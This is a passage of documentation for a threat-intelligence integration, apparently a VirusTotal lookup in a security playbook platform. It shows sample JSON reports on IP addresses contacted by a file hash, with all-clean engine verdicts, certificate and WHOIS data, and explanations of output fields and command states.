"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"reputation": 0,
"last_modification_date": 1625850459,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"last_https_certificate": {
"size": 1326,
"public_key": {
"ec": {
"oid": "*****",
"pub": "*****"
},
"algorithm": "EC"
},
"thumbprint_sha256": "*****",
"tags": [],
"cert_signature": {
"signature": "*****",
"signature_algorithm": "sha256ECDSA"
},
"validity": {
"not_after": "2021-09-13 12:00:00",
"not_before": "2020-07-15 00:00:00"
},
"version": "V3",
"extensions": {
"certificate_policies": [
"2.16.840.1.114412.1.1",
"2.23.140.1.2.2"
],
"extended_key_usage": [
"serverAuth",
"clientAuth"
],
"authority_key_identifier": {
"keyid": "*****"
},
"subject_alternative_name": [
"a248.e.akamai.net",
"*.akamaized.net",
"*.akamaihd-staging.net",
"*.akamaihd.net",
"*.akamaized-staging.net"
],
"tags": [],
"subject_key_identifier": "*****",
"crl_distribution_points": [
"http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl",
"http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl"
],
"key_usage": [
"ff"
],
"1.3.6.1.4.1.11129.2.4.2": "*****",
"CA": true,
"ca_information_access": {
"CA Issuers": "http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt",
"OCSP": "http://ocsp.digicert.com"
}
},
"signature_algorithm": "sha256ECDSA",
"serial_number": "*****",
"thumbprint": "*****",
"issuer": {
"C": "US",
"CN": "DigiCert Secure Site ECC CA-1",
"O": "DigiCert Inc",
"OU": "www.digicert.com"
},
"subject": {
"C": "US",
"ST": "Massachusetts",
"CN": "a248.e.akamai.net",
"O": "Akamai Technologies, Inc.",
"L": "Cambridge"
}
},
"continent": "NA",
"whois": " Domain Name: AKAMAITECHNOLOGIES.COM\r\n Registry Domain ID: *****\r\n Registrar WHOIS Server: whois.akamai.com\r\n Registrar URL: http://www.akamai.com\r\n Updated Date: 2020-08-20T18:59:45Z\r\n Creation Date: 1998-08-18T04:00:00Z\r\n Registry Expiry Date: 2022-08-17T04:00:00Z\r\n Registrar: Akamai Technologies, Inc.\r\n Registrar IANA ID: 2480\r\n Registrar Abuse Contact Email: *****@*****.***\r\n Registrar Abuse Contact Phone: +1.*****\r\n Domain Status: clientDeleteProhibited https://icann.org/*****\r\n Domain Status: clientTransferProhibited https://icann.org/*****\r\n Domain Status: clientUpdateProhibited https://icann.org/*****\r\n Domain Status: serverDeleteProhibited https://icann.org/*****\r\n Domain Status: serverTransferProhibited https://icann.org/*****\r\n Domain Status: serverUpdateProhibited https://icann.org/*****\r\n Name Server: AX0.AKAMAISTREAM.NET\r\n Name Server: AX1.AKAMAISTREAM.NET\r\n Name Server: AX2.AKAMAISTREAM.NET\r\n Name Server: AX3.AKAMAISTREAM.NET\r\n Name Server: NS2-32.AKAMAISTREAM.NET\r\n Name Server: NS3-32.AKAMAISTREAM.NET\r\n Name Server: NS6-32.AKAMAISTREAM.NET\r\n Name Server: P5.AKAMAISTREAM.NET\r\n Name Server: P6.AKAMAISTREAM.NET\r\n Name Server: P7.AKAMAISTREAM.NET\r\n Name Server: P8.AKAMAISTREAM.NET\r\n DNSSEC: unsigned\r\n URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/*****/\r\n>>> Last update of whois database: 2021-06-26T08:18:02Z <<<\r\n\r\nFor more information on Whois status codes, please visit https://icann.org/epp\r\n\r\nNOTICE: The expiration date displayed in this record is the date the\r\nregistrar's sponsorship of the domain name registration in the registry is\r\ncurrently set to expire. This date does not necessarily reflect the expiration\r\ndate of the domain name registrant's agreement with the sponsoring\r\nregistrar. Users may consult the sponsoring registrar's Whois database to\r\nview the registrar's reported date of expiration for this registration.\r\n\r\nTERMS OF USE: You are not authorized to access or query our Whois\r\ndatabase through the use of electronic processes that are high-volume and\r\nautomated except as reasonably necessary to register domain names or\r\nmodify existing registrations; the Data in VeriSign Global Registry\r\nServices' (\"VeriSign\") Whois database is provided by VeriSign for\r\ninformation purposes only, and to assist persons in obtaining information\r\nabout or related to a domain name registration record. VeriSign does not\r\nguarantee its accuracy. By submitting a Whois query, you agree to abide\r\nby the following terms of use: You agree that you may use this Data only\r\nfor lawful purposes and that under no circumstances will you use this Data\r\nto: (1) allow, enable, or otherwise support the transmission of mass\r\nunsolicited, commercial advertising or solicitations via e-mail, telephone,\r\nor facsimile; or (2) enable high volume, automated, electronic processes\r\nthat apply to VeriSign (or its computer systems). The compilation,\r\nrepackaging, dissemination or other use of this Data is expressly\r\nprohibited without the prior written consent of VeriSign. You agree not to\r\nuse electronic processes that are automated and high-volume to access or\r\nquery the Whois database except as reasonably necessary to register\r\ndomain names or modify existing registrations. VeriSign reserves the right\r\nto restrict your access to the Whois database in its sole discretion to ensure\r\noperational stability. VeriSign may restrict or terminate your access to the\r\nWhois database for failure to abide by these terms of use. VeriSign\r\nreserves the right to modify these terms at any time.\r\n\r\nThe Registry database contains ONLY .COM, .NET, .EDU domains and\r\nRegistrars.\r\ndomain: akamaitechnologies.com\nDomainName: AKAMAITECHNOLOGIES.COM\nRegistry Domain ID: *****\nRegistrar WHOIS Server: whois.akamai.com\nRegistrar URL: http://www.akamai.com\nUpdated Date: 2020-08-20T18:59:45.0000Z\nCreation Date: 1998-08-18T04:00:00.0000Z\nRegistrar Registration Expiration Date: 2022-08-17T04:00:00.0000Z\nSponsoring Registrar: Akamai Technologies, INC.\nSponsoring Registrar IANA ID: 2480\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: +1.*****\nDomain Status: clientDeleteProhibited https://icann.org/*****\nDomain Status: clientTransferProhibited https://icann.org/*****\nDomain Status: clientUpdateProhibited https://icann.org/*****\nDomain Status: serverDeleteProhibited https://icann.org/*****\nDomain Status: serverTransferProhibited https://icann.org/*****\nDomain Status: serverUpdateProhibited https://icann.org/*****\nRegistrant Name: Hostmaster Billing\nRegistrant Organization: Akamai Technologies, inc.\nRegistrant Street: 145 Broadway\nRegistrant City: Cambridge\nRegistrant State/Province: MA\nRegistrant Postal Code: 02142\nRegistrant Country: US\nRegistrant Phone: +1.6174443000\nRegistrant Phone Ext: \nRegistrant Fax: +1.6174443001\nRegistrant Fax Ext: \nRegistrant Email: hostmaster-billing@akamai.com\nAdmin Name: Hostmaster Billing\nAdmin Organization: Akamai Technologies, inc.\nAdmin Street: 145 Broadway\nAdmin City: Cambridge\nAdmin State/Province: MA\nAdmin Postal Code: 02142\nAdmin Country: US\nAdmin Phone: +1.6174443000\nAdmin Phone Ext: \nAdmin Fax: +1.6174443001\nAdmin Fax Ext: \nAdmin Email: hostmaster-billing@akamai.com\nTech Name: Hostmaster Billing\nTech Organization: Akamai Technologies, inc.\nTech Street: 145 Broadway\nTech City: Cambridge\nTech State/Province: MA\nTech Postal Code: 02142\nTech Country: US\nTech Phone: +1.6174443000\nTech Phone Ext: \nTech Fax: +1.6174443001\nTech Fax Ext: \nTech Email: hostmaster-billing@akamai.com\nBilling Name: Hostmaster Billing\nBilling Organization: Akamai Technologies, inc.\nBilling Street: 145 Broadway\nBilling City: Cambridge\nBilling State/Province: MA\nBilling Postal Code: 02142\nBilling Country: US\nBilling Phone: +1.6174443000\nBilling Phone Ext: \nBilling Fax: +1.6174443001\nBilling Fax Ext: \nBilling Email: hostmaster-billing@akamai.com\nName Server: AX0.AKAMAISTREAM.NET\nName Server: AX1.AKAMAISTREAM.NET\nName Server: AX2.AKAMAISTREAM.NET\nName Server: AX3.AKAMAISTREAM.NET\nName Server: NS2-32.AKAMAISTREAM.NET\nName Server: NS3-32.AKAMAISTREAM.NET\nName Server: NS6-32.AKAMAISTREAM.NET\nName Server: P5.AKAMAISTREAM.NET\nName Server: P6.AKAMAISTREAM.NET\nName Server: P7.AKAMAISTREAM.NET\nName Server: P8.AKAMAISTREAM.NET\nDNSSEC: unsigned\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\n>>> Last update of WHOIS database: 2021-06-26T07:55:01Z <<<\nFor more information on Whois status codes, please visit https://icann.org/epp\nNotice: By submitting a WHOIS query, you agree to abide by the following: This information\nNotice: is provided for the sole purpose of assisting you in obtaining information about\nNotice: domain name registration records and is made available on an \"AS-IS\" basis. \nNotice: Akamai Technologies makes no warranty as to the accuracy or completeness of the\nNotice: information provided by registrants for inclusion in the Akamai WHOIS database.\nNotice: You may use this data only for lawful purposes and that under no circumstances\nNotice: will you use this data to: (1) allow, enable, or otherwise support the \nNotice: transmission of mass unsolicited, commercial advertising or solicitations via\nNotice: direct mail, e-mail, telephone, or facsimile; or (2) enable high volume, \nNotice: automated, electronic processes that apply to Akamai Technologies (or its computer\nNotice: systems). Any use of this data for other purposes is prohibited without the prior \nNotice: written consent of Akamai Technologies.\n"
},
"type": "ip_address",
"id": "***.***.***.***",
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
},
{
"attributes": {
"regional_internet_registry": "ARIN",
"network": "***.***.***.***/**",
"tags": [],
"country": "US",
"as_owner": "MICROSOFT-CORP-MSN-AS-BLOCK",
"last_analysis_stats": {
"harmless": 84,
"malicious": 0,
"suspicious": 0,
"undetected": 0,
"timeout": 0
},
"asn": 8075,
"whois_date": 1623825782,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"AutoShun": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Netcraft"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"reputation": 0,
"last_modification_date": 1625790901,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"continent": "NA",
"whois": "NetRange: ***.***.***.*** - ***.***.***.***\nCIDR: ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/15, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**\nNetName: MSFT\nNetHandle: NET-40-74-0-0-1\nParent: NET40 (NET-40-0-0-0-0)\nNetType: Direct Assignment\nOriginAS: \nOrganization: Microsoft Corporation (MSFT)\nRegDate: 2015-02-23\nUpdated: 2015-05-27\nRef: https://rdap.arin.net/registry/ip/***.***.***.***\nOrgName: Microsoft Corporation\nOrgId: MSFT\nAddress: One Microsoft Way\nCity: Redmond\nStateProv: WA\nPostalCode: 98052\nCountry: US\nRegDate: 1998-07-10\nUpdated: 2021-04-13\nComment: To report suspected security issues specific to traffic emanating from Microsoft online services, including the distribution of malicious content or other illicit or illegal material through a Microsoft online service, please submit reports to:\r\nComment: * https://cert.microsoft.com. \r\nComment: \r\nComment: For SPAM and other abuse issues, such as Microsoft Accounts, please contact:\r\nComment: * abuse@microsoft.com. \r\nComment: \r\nComment: To report security vulnerabilities in Microsoft products and services, please contact:\r\nComment: * secure@microsoft.com. \r\nComment: \r\nComment: For legal and law enforcement-related requests, please contact:\r\nComment: * msndcc@microsoft.com\r\nComment: \r\nComment: For routing, peering or DNS issues, please \r\nComment: contact:\r\nComment: * IOC@microsoft.com\nRef: https://rdap.arin.net/registry/entity/MSFT\nOrgDNSHandle: YSRH-ARIN\nOrgDNSName: Yalamati, Sree Raghu Harsha \nOrgDNSPhone: +917702220771 \nOrgDNSEmail: v-raghuy@microsoft.com\nOrgDNSRef: https://rdap.arin.net/registry/entity/YSRH-ARIN\nOrgTechHandle: MRPD-ARIN\nOrgTechName: Microsoft Routing, Peering, and DNS\nOrgTechPhone: +1-425-882-8080 \nOrgTechEmail: IOC@microsoft.com\nOrgTechRef: https://rdap.arin.net/registry/entity/MRPD-ARIN\nOrgTechHandle: BEDAR6-ARIN\nOrgTechName: Bedard, Dawn \nOrgTechPhone: +1-425-538-6637 \nOrgTechEmail: dabedard@microsoft.com\nOrgTechRef: https://rdap.arin.net/registry/entity/BEDAR6-ARIN\nOrgAbuseHandle: MAC74-ARIN\nOrgAbuseName: Microsoft Abuse Contact\nOrgAbusePhone: +1-425-882-8080 \nOrgAbuseEmail: abuse@microsoft.com\nOrgAbuseRef: https://rdap.arin.net/registry/entity/MAC74-ARIN\n"
},
"type": "ip_address",
"id": "***.***.***.***",
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/files/*****/contacted_ips?limit=10"
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"FileHashes": [
"*****"
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
FILE_HASH | META | DATA | LINKS |
|---|---|---|---|
***** | {'count': 3} | [{'attributes': {'regional_internet_registry': 'ARIN', 'jarm': '*****', 'network': '***.***.***.***/**', 'last_https_certificate_date': 1625850459, 'tags': [], 'country': 'US', 'as_owner': 'Akamai International B.V.', 'last_analysis_stats': {'harmless': 76, 'malicious': 0, 'suspicious': 0, 'undetected': 9, 'timeout': 0}, 'asn': *****, 'whois_date': 1624695500, 'last_analysis_results': {'CMC Threat Intelligence': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CMC Threat Intelligence'}, 'DNS8': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'DNS8'}, 'Lionic': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Lionic'}, 'Snort IP sample list': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Snort IP sample list'}, 'AICC (MONITORAPP)': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AICC (MONITORAPP)'}, 'http://benkow.cc ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://benkow.cc '}, 'VX Vault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'VX Vault'}, 'securolytics': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'securolytics'}, 'MalwarePatrol': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwarePatrol'}, 'Armis': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Armis'}, 'MalBeacon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalBeacon'}, 'Comodo Valkyrie Verdict': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Comodo Valkyrie Verdict'}, 'PhishLabs': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'PhishLabs'}, 'EmergingThreats': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EmergingThreats'}, 'zvelo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'zvelo'}, 'K7AntiVirus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'K7AntiVirus'}, 'Nucleon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Nucleon'}, 'Virusdie External Site Scan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Virusdie External Site Scan'}, 'CINS Army': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CINS Army'}, 'Spamhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spamhaus'}, 'Quttera': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quttera'}, 'Yandex Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Yandex Safebrowsing'}, 'SafeToOpen': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'SafeToOpen'}, 'MalwareDomainList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwareDomainList'}, 'CyberCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyberCrime'}, 'Lumu': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Lumu'}, 'Google Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Google Safebrowsing'}, 'FraudScore': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'FraudScore'}, 'Kaspersky': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Kaspersky'}, 'BitDefender': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BitDefender'}, 'Emsisoft': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Emsisoft'}, 'GreenSnow': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'GreenSnow'}, 'G-Data': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'G-Data'}, 'Segasec': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Segasec'}, 'OpenPhish': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'OpenPhish'}, 'Sucuri SiteCheck': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sucuri SiteCheck'}, 'AutoShun': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'AutoShun'}, 'Trustwave': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Trustwave'}, 'Web Security Guard': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Web Security Guard'}, 'CyRadar': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyRadar'}, 'http://desenmascara.me ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://desenmascara.me '}, 'ADMINUSLabs': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 